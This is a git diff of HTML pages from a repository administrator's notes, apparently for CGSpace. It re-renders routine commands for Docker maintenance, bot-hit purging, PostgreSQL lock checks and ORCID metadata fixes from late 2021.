                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ docker-compose down
                                                                                                                                                                                                                                                                                                                            +$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                            +$ cp -a backend/data backend/data.2021-11-14
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Then I checked out the latest git commit, updated all images, rebuilt the project:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                            -$ docker-compose build
                                                                                                                                                                                                                                                                                                                            -$ docker-compose up -d
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                              +$ docker-compose build
                                                                                                                                                                                                                                                                                                                              +$ docker-compose up -d
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Then I updated the repository configurations and started a fresh harvest
                                                                                                                                                                                                                                                                                                                              • Help Francesca from the Alliance with a question about embargos on CGSpace items
                                                                                                                                                                                                                                                                                                                                  @@ -315,11 +315,11 @@ $ docker-compose up -d
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                                                                                                                                                                                                                                                              -Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 10893
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                                                                                                                                                                                                                                                                +Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 10893
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
                                                                                                                                                                                                                                                                                                                                  • I finally deployed the changes on both servers
                                                                                                                                                                                                                                                                                                                                  • @@ -344,8 +344,8 @@ Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
                                                                                                                                                                                                                                                                                                                                    • Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently…
                                                                                                                                                                                                                                                                                                                                    • @@ -365,20 +365,20 @@ Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  -Found 8352 hits from 138.201.49.199 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 9374 hits from 78.46.89.18 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 2112 hits from 93.179.69.74 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 1 hits from 31.6.77.23 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 5 hits from 34.209.213.122 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 86772 hits from 163.172.68.99 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 77 hits from 163.172.70.248 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 15842 hits from 163.172.71.24 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 172954 hits from 104.154.216.0 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  -Total number of hits from bots: 295492
                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                  2021-11-27

                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  +Found 8352 hits from 138.201.49.199 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 9374 hits from 78.46.89.18 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 2112 hits from 93.179.69.74 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 1 hits from 31.6.77.23 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 5 hits from 34.209.213.122 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 86772 hits from 163.172.68.99 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 77 hits from 163.172.70.248 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 15842 hits from 163.172.71.24 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 172954 hits from 104.154.216.0 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  +Total number of hits from bots: 295492
                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                  2021-11-27

                                                                                                                                                                                                                                                                                                                                  • Peter sent me corrections for the authors that I had sent him back in 2021-09
                                                                                                                                                                                                                                                                                                                                      @@ -387,16 +387,16 @@ Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • Then I imported to CGSpace and started a full Discovery re-index:
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    -real    272m43.818s
                                                                                                                                                                                                                                                                                                                                    -user    183m4.543s
                                                                                                                                                                                                                                                                                                                                    -sys     2m47.988
                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                    2021-11-28

                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    +real    272m43.818s
                                                                                                                                                                                                                                                                                                                                    +user    183m4.543s
                                                                                                                                                                                                                                                                                                                                    +sys     2m47.988
                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                    2021-11-28

                                                                                                                                                                                                                                                                                                                                    • Run system updates on AReS server (linode20) and update all Docker containers and reboot
                                                                                                                                                                                                                                                                                                                                        @@ -405,12 +405,12 @@ sys 2m47.988
                                                                                                                                                                                                                                                                                                                                      • I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                      npm WARN EBADENGINE Unsupported engine {
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   package: '@angular-devkit/architect@0.901.15',
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   current: { node: 'v12.22.7', npm: '8.1.3' }
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                      2021-11-29

                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      npm WARN EBADENGINE Unsupported engine {
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   package: '@angular-devkit/architect@0.901.15',
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   current: { node: 'v12.22.7', npm: '8.1.3' }
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                                                                      2021-11-29

                                                                                                                                                                                                                                                                                                                                      • Tezira reached out to me to say that submissions on CGSpace are taking forever
                                                                                                                                                                                                                                                                                                                                      • I see a definite increase in locks in the last few days:
                                                                                                                                                                                                                                                                                                                                      • @@ -419,24 +419,24 @@ npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                        • The locks are all held by dspaceWeb (XMLUI):
                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                        $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                        -      1 
                                                                                                                                                                                                                                                                                                                                        -      1 ------------------
                                                                                                                                                                                                                                                                                                                                        -      1 (1394 rows)
                                                                                                                                                                                                                                                                                                                                        -      1  application_name 
                                                                                                                                                                                                                                                                                                                                        -      9  psql
                                                                                                                                                                                                                                                                                                                                        -   1385  dspaceWeb
                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          +      1 
                                                                                                                                                                                                                                                                                                                                          +      1 ------------------
                                                                                                                                                                                                                                                                                                                                          +      1 (1394 rows)
                                                                                                                                                                                                                                                                                                                                          +      1  application_name 
                                                                                                                                                                                                                                                                                                                                          +      9  psql
                                                                                                                                                                                                                                                                                                                                          +   1385  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          • I restarted PostgreSQL and the locks dropped down:
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          -      1
                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                          -      1 (103 rows)
                                                                                                                                                                                                                                                                                                                                          -      1  application_name
                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                          -     94  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                          2021-11-30

                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          +      1
                                                                                                                                                                                                                                                                                                                                          +      1 ------------------
                                                                                                                                                                                                                                                                                                                                          +      1 (103 rows)
                                                                                                                                                                                                                                                                                                                                          +      1  application_name
                                                                                                                                                                                                                                                                                                                                          +      9  psql
                                                                                                                                                                                                                                                                                                                                          +     94  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          +
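The `sort | uniq -c` pipeline above also counts psql's header, separator, and row-count footer as if they were application names, which is why each of those shows up with a count of 1. A minimal sketch of the same tally in Python, assuming the `application_name` values have already been fetched as plain strings (for example with `psql -A -t`, which suppresses the header and footer). The function name `count_locks_by_application` and the sample list are hypothetical; the sample simply mirrors the post-restart counts shown above.

```python
from collections import Counter


def count_locks_by_application(names):
    """Tally lock rows per application name.

    Blank or missing names (locks with no matching pg_stat_activity row
    in the LEFT JOIN) are grouped under the placeholder "(none)".
    """
    cleaned = [(name or "").strip() or "(none)" for name in names]
    return Counter(cleaned)


# Hypothetical input: one entry per row returned by the pg_locks query.
sample = ["dspaceWeb"] * 94 + ["psql"] * 9

# Print in ascending order of count, like `sort -n` in the shell pipeline.
for app, count in sorted(count_locks_by_application(sample).items(), key=lambda kv: kv[1]):
    print(f"{count:7d}  {app}")
```

Grouping blank names under an explicit placeholder keeps orphaned locks visible instead of leaving them as an unlabeled row.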

                                                                                                                                                                                                                                                                                                                                          2021-11-30

                                                                                                                                                                                                                                                                                                                                          • IWMI sent me ORCID identifiers for some new staff
                                                                                                                                                                                                                                                                                                                                              @@ -444,36 +444,36 @@ npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -1348 /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +1348 /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            $ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              • Then I updated some ORCID identifiers that had changed in the XML:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ cat 2021-11-30-fix-orcids.csv
                                                                                                                                                                                                                                                                                                                                              -cg.creator.identifier,correct
                                                                                                                                                                                                                                                                                                                                              -"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
                                                                                                                                                                                                                                                                                                                                              -"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
                                                                                                                                                                                                                                                                                                                                              -"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
                                                                                                                                                                                                                                                                                                                                              -"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-fix-orcids.csv
                                                                                                                                                                                                                                                                                                                                                +cg.creator.identifier,correct
                                                                                                                                                                                                                                                                                                                                                +"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
                                                                                                                                                                                                                                                                                                                                                +"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
                                                                                                                                                                                                                                                                                                                                                +"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
                                                                                                                                                                                                                                                                                                                                                +"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
                                                                                                                                                                                                                                                                                                                                                +
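Before applying a corrections file like the one above, it can help to confirm that each row only changes the name and leaves the ORCID iD itself untouched. The following is a minimal sketch of such a check, not part of fix-metadata-values.py; the helper names `split_identifier` and `changed_ids` are hypothetical, and it assumes the "Name: 0000-0000-0000-0000" format shown in the CSV.

```python
import csv
import io


def split_identifier(value):
    """Split 'Name: 0000-0000-0000-0000' into (name, orcid)."""
    name, _, orcid = value.rpartition(": ")
    return name, orcid


def changed_ids(csv_text, old_col="cg.creator.identifier", new_col="correct"):
    """Return rows where the ORCID iD differs between old and new values."""
    mismatches = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        _, old_id = split_identifier(row[old_col])
        _, new_id = split_identifier(row[new_col])
        if old_id != new_id:
            mismatches.append((row[old_col], row[new_col]))
    return mismatches


# Two rows copied from the corrections file above
SAMPLE = '''cg.creator.identifier,correct
"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
'''

if __name__ == "__main__":
    # An empty list means every correction keeps its original iD
    print(changed_ids(SAMPLE))
```

An empty result means the file only renames authors; any row returned would deserve a manual look before running the fix.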
• Tag existing items by IWMI’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (7 new metadata fields added):
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                -"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                -"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                -"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                -"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                -"Rex, William","William Rex: 0000-0003-4979-5257"
                                                                                                                                                                                                                                                                                                                                                -"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                +"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                +"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                +"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                +"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                +"Rex, William","William Rex: 0000-0003-4979-5257"
                                                                                                                                                                                                                                                                                                                                                +"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                +
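Since a mistyped iD in a file like this would be written straight into the metadata, one possible pre-flight step is to verify each identifier's check digit. ORCID iDs end in an ISO 7064 MOD 11-2 check character, and the sketch below implements that calculation. It is an illustration only and is not something add-orcid-identifiers-csv.py is known to do; the function names are hypothetical.

```python
def orcid_check_digit(base_digits):
    """Compute the ISO 7064 MOD 11-2 check character for 15 base digits."""
    total = 0
    for ch in base_digits:
        total = (total + int(ch)) * 2
    result = (12 - total % 11) % 11
    return "X" if result == 10 else str(result)


def is_valid_orcid(orcid):
    """Return True if a hyphenated ORCID iD has a correct check character."""
    compact = orcid.replace("-", "")
    if len(compact) != 16 or not compact[:15].isdigit():
        return False
    return orcid_check_digit(compact[:15]) == compact[15].upper()


if __name__ == "__main__":
    # Identifiers taken from the CSV above
    for orcid in ("0000-0001-9027-5232", "0000-0002-7829-9300"):
        print(orcid, is_valid_orcid(orcid))
```

A check like this only catches typos in the iD itself. It cannot tell whether an iD belongs to the author it is paired with.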
                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/2021-12/index.html b/docs/2021-12/index.html index 551863d18..f5f21f70d 100644 --- a/docs/2021-12/index.html +++ b/docs/2021-12/index.html @@ -40,7 +40,7 @@ Purging 455 hits from WhatsApp in statistics Total number of bot hits purged: 3679 "/> - + @@ -131,13 +131,13 @@ Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                              • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                              -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                              -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                              -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                              2021-12-02

                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                              +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                              +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                              +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              +
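The per-agent counts in the output above can be cross-checked against the reported total. This is a small sketch that parses the "Purging N hits from AGENT in statistics" lines as they appear in the log; the `purged_hits` helper is hypothetical and not part of check-spider-hits.sh.

```python
import re

# Matches lines like: Purging 1989 hits from The Knowledge AI in statistics
PURGE_RE = re.compile(r"^Purging (\d+) hits from (.+) in statistics$")


def purged_hits(log_text):
    """Map each user agent pattern to the number of hits purged for it."""
    hits = {}
    for line in log_text.splitlines():
        match = PURGE_RE.match(line.strip())
        if match:
            hits[match.group(2)] = int(match.group(1))
    return hits


# Output copied from the run above
LOG = """Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics

Total number of bot hits purged: 3679
"""

if __name__ == "__main__":
    hits = purged_hits(LOG)
    # The sum should agree with the "Total number of bot hits purged" line
    print(sum(hits.values()))
```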

                                                                                                                                                                                                                                                                                                                                              2021-12-02

                                                                                                                                                                                                                                                                                                                                              • Francesca from Alliance asked me for help with approving a submission that gets stuck
                                                                                                                                                                                                                                                                                                                                                  @@ -145,23 +145,23 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                              -      1 
                                                                                                                                                                                                                                                                                                                                              -      1 ------------------
                                                                                                                                                                                                                                                                                                                                              -      1 (1437 rows)
                                                                                                                                                                                                                                                                                                                                              -      1  application_name 
                                                                                                                                                                                                                                                                                                                                              -      9  psql
                                                                                                                                                                                                                                                                                                                                              -   1428  dspaceWeb
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                +      1 
                                                                                                                                                                                                                                                                                                                                                +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                +      1 (1437 rows)
                                                                                                                                                                                                                                                                                                                                                +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                +      9  psql
                                                                                                                                                                                                                                                                                                                                                +   1428  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                • Munin shows the same:

                                                                                                                                                                                                                                                                                                                                                PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                                • Last month I enabled the log_lock_waits in PostgreSQL so I checked the log and was surprised to find only a few since I restarted PostgreSQL three days ago:
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                # grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                -15
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  # grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                  +15
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  • I think you could analyze the locks for the dspaceWeb user (XMLUI) and find out what queries were locking… but it’s so much information and I don’t know where to start
                                                                                                                                                                                                                                                                                                                                                    • For now I just restarted PostgreSQL…
                                                                                                                                                                                                                                                                                                                                                    • @@ -250,9 +250,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                    • I noticed a strange user agent in the XMLUI logs on CGSpace:
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                    20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
                                                                                                                                                                                                                                                                                                                                                    -20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
                                                                                                                                                                                                                                                                                                                                                      +20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      • I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
                                                                                                                                                                                                                                                                                                                                                        • It could be someone on Azure?
                                                                                                                                                                                                                                                                                                                                                        • @@ -261,11 +261,11 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                        • I purged 34,000 hits from this user agent in our Solr statistics:
                                                                                                                                                                                                                                                                                                                                                        -
